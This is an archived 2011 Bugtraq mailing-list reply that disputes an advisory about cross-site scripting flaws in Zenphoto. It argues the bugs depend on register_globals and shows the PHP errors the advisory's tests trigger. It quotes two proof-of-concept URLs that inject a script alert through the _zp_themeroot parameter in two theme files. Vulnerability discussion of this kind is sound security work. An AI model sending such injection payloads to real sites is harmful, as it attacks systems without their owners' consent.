| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <alpine.DEB.2.01.1104221418060.18728@trent.utfs.org> Date: Fri, 22 Apr 2011 14:28:25 -0700 (PDT) From: Christian Kujau <lists@...dbynature.de> To: advisory@...ridge.ch Cc: bugtraq@...urityfocus.com Subject: Re: HTB22945: Multiple XSS in ZENphoto On Thu, 21 Apr 2011 at 13:42, advisory@...ridge.ch wrote: > The vulnerability exists due to failure in the "/themes/zenpage/slideshow.php" > script to properly sanitize user-supplied input in "_zp_themeroot" > variable then register_globals is on. You mean "if register_globals is on"? I thought anything relying on register_globals was b0rked anyway? Zenphoto lists "PHP 5.2+" as its requirements and "register_globals" defauts to "off" since PHP 4.2.0. That being said, the PoC generates some messages in the logs: > http://[host]/themes/zenpage/slideshow.php?_zp_themeroot=%22%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E PHP Notice: Undefined variable: _zp_themeroot in ../zenphoto/themes/zenpage/slideshow.php on line 9 PHP Fatal error: Call to undefined function zp_apply_filter() in ../zenphoto/themes/zenpage/slideshow.php on line 10 > http://[host]/themes/stopdesign/comment_form.php?_zp_themeroot=%22%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E PHP Notice: Undefined variable: _zp_themeroot in ../zenphoto/themes/stopdesign/comment_form.php on line 6 PHP Notice: Undefined variable: disabled in ../zenphoto/themes/stopdesign/comment_form.php on line 25 PHP Fatal error: Call to undefined function html_encode() in ../zenphoto/themes/stopdesign/comment_form.php on line 32 C. -- BOFH excuse #160: non-redundant fan failure
Powered by blists - more mailing lists